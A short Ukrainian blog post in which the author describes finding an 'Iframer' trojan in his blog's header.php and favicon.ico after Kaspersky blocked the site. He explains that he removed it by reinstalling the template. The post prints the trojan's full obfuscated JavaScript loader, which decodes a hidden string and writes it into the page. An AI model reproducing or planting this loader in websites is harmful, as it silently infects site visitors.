HEUR:Trojan.Script.Iframer
“Запрещено: HEUR:Trojan.Script.Iframer Firefox http://bompok.org.ua/” – ось таке повідомлення видав мені KIS (Kaspersky Internet Security), коли я намагався зайти на свій блог.
Ось вирішив дізнатись, що за троян і які можуть бути наслідки. На форумі Лабораторії Касперського http://forum.kaspersky.com/index.php?showtopic=100490, пишуть, що вірус знаходили у файлах index.php або favicon.ico, а у моєму випадку, в header.php та favicon.ico. Також знаходив пости де було написане наступне: троян змінює вміст файлу .htaccess, але що саме змінює троян, автор визначити не зміг, попри це він сказав, що майже усі файли були заражені цим трояном. Скачавши шаблон собі на комп’ютер, провірив файли на віруси, KIS сказав, що всі файли були зараженні, хоча саме тіло трояна знаходилось у файлі header.php і мало такий вигляд: <script type=”text/javascript”>var jGt7H3IkS=Array(63,6,19,54,61,31,22,51,12,33,0,0,0,0,0,0,49,5,4,62,2,25,29,38,39
,44,26,28,42,57,21,34,13,7,56,43,41,47,1,3,37,40,11,0,0,0,0,30,0,14,58,17,27,0,8,
60,16,36,35,20,46,24,48,10,32,9,15,23,52,53,59,50,55,45,18),OmFORSBhopxKumqErMdN3
QYTiogrWyNLb2agSAc=”Ewgns28wesYusd8GQ3Ktcs4HoLmts2gnWSInoUgO1S8wo_m96QPxqW8GQ1876sFwB74HZSgwe5R
GELf7W5P@fWgG”,JjrjMmsvdcJ8K6muubIPn=0,CCdH_4HW=0,Lv0RDYvi6cLNHfJ=0,EnMfvr1feyNJmFLN6C0pI
DRx7SSTALRmlVGS,KuX2VtJp1ALLHMe=OmFORSBhopxKumqErMdN3QYTiogrWyNLb2agSAc.length,K0
38OalUn4uJ0NbuTkOpcwrqivshmm=1024;window.status=’ ‘;for(var uno17GYg1C=Math.ceil(KuX2VtJp1ALLHMe/K038OalUn4uJ0NbuTkOpcwrqivshmm);uno17GYg1C>0;uno17GYg1C–){EnMfvr1feyNJmFLN6C0pIDRx7SSTALRmlVGS=”;for(var wwNLNtvgHo3KskNgx=Math.min(KuX2VtJp1ALLHMe,K038OalUn4uJ0NbuTkOpcwrqivshmm);wwNLN
tvgHo3KskNgx>0;wwNLNtvgHo3KskNgx–,KuX2VtJp1ALLHMe–){JjrjMmsvdcJ8K6muubIPn|=(jGt7H3IkS[OmFORSBhopxKumqErMdN3QYTiogrWyNLb2agSAc.char
CodeAt(Lv0RDYvi6cLNHfJ++)-48])<<CCdH_4HW;if(CCdH_4HW){EnMfvr1feyNJmFLN6C0pIDRx7SSTALRmlVGS+=String.fromCharCo
de(165^JjrjMmsvdcJ8K6muubIPn&255);JjrjMmsvdcJ8K6muubIPn>>=8;CCdH_4HW-=2}else CCdH_4HW=6}document.write(EnMfvr1feyNJmFLN6C0pIDRx7SSTALRmlVGS);}</script>
Я видалив його з сервера і залив новий шаблон. Знову заходимо на сайт і KIS нічого не каже, усе працює.
